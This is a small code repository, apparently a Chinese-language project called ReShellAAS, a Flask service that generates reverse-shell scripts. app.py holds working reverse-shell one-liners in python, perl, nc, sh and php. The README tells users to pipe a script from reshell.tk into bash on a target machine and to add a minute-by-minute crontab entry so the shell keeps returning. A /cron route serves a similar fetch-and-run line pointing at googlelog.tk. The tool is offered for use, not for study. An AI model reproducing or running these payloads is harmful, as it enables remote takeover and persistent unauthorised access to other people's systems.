├── .gitignore ├── LICENSE ├── README.md └── app.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 童话 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ReShellAAS 2 | Reverse Shell as a Service 3 | 反弹shell即服务 4 | 5 | # 项目简介 6 | 无需再去记住复杂的反弹shell命令,通过Reverse Shell as a Service可以方便、快捷的创建反弹shell脚本。 7 | 8 | # 安装及服务端启动方法 9 | ``` 10 | pip3 install flask 11 | python3 app.py 12 | ``` 13 | 14 | # 使用方法 15 | ## Attacker Machine 16 | ``` 17 | nc -l 1337 18 | ``` 19 | 20 | ## Target Machine 21 | ``` 22 | curl http://reshell.tk/ip/1337 | bash 23 | 或者 24 | while true; do curl http://reshell.tk/ip/1337 | bash; done 25 | ``` 26 | 配合crontab使用效果更佳 27 | ``` 28 | crontab -e 29 | * * * * * /usr/bin/curl http://reshell.tk/ip/1337 | bash 30 | ``` 31 | 32 | # 致谢 33 | 感谢P师傅以及P师傅的知识星球以及原创这个点子的小机灵鬼。 34 | 35 | # TODO 36 | - 适应多场景的反弹shell语法 37 | - etc... 38 | 39 | -------------------------------------------------------------------------------- /app.py: -------------------------------------------------------------------------------- 1 | """ 2 | Reverse Shell as a Service 3 | """ 4 | from flask import Flask 5 | from flask import make_response 6 | 7 | app = Flask(__name__) 8 | 9 | usgae = \ 10 | """# Reverse Shell as a Service 11 | # https://github.com/omg2hei/ReShellAAS 12 | # 13 | # 1. On Attacker Machine: 14 | # nc -l 1337 15 | # 16 | # 2. On The Target Machine: 17 | # curl http://reshell.tk/ip/1337 | bash 18 | # 19 | # 3. Enjoy it. 20 | """ 21 | 22 | def reverse_shell_payload(host, port): 23 | payload = { 24 | 'python': """python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("%(host)s",%(port)s)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'""" % {'host': host, 'port': port}, 25 | 'perl': """perl -e 'use Socket;$i="%(host)s";$p=%(port)s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % {'host': host, 'port': port}, 26 | 'nc': """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %(host)s %(port)s >/tmp/f""" % {'host': host, 'port': port}, 27 | 'sh': """/bin/sh -i >& /dev/tcp/%(host)s/%(port)s 0>&1""" % {'host': host, 'port': port}, 28 | 'php': """php -r '$sock=fsockopen("%(host)s",%(port)s);exec("/bin/sh -i <&3 >&3 2>&3");'""" % {'host': host, 'port': port}, # 未测试 29 | } 30 | return payload 31 | 32 | def generate_shell_script(host, port): 33 | payload = reverse_shell_payload(host, port) 34 | shell_script = '' 35 | for key in payload: 36 | shell_script += """ 37 | if command -v %(key)s > /dev/null 2>&1; then 38 | %(payload)s 39 | exit; 40 | fi 41 | """ % {'key': key, 'payload': payload[key]} 42 | return shell_script 43 | 44 | @app.route('/') 45 | @app.route('//') 46 | def main(host=None, port=None): 47 | if host==None or port==None: 48 | response = make_response(usgae) 49 | response.headers["content-type"] = "text/plain" 50 | return response 51 | else: 52 | shell_script = generate_shell_script(host, port) 53 | response = make_response(usgae + shell_script) 54 | response.headers["content-type"] = "text/plain" 55 | return response 56 | 57 | @app.route('/cron') 58 | def cron(): 59 | crontab_text = "* * * * * /usr/bin/curl http://googlelog.tk/googlelog.tk/443 | bash\n" 60 | response = make_response(crontab_text) 61 | response.headers["content-type"] = "text/plain" 62 | return response 63 | 64 | 65 | if __name__ == '__main__': 66 | app.run(host='0.0.0.0', port=80) 67 | --------------------------------------------------------------------------------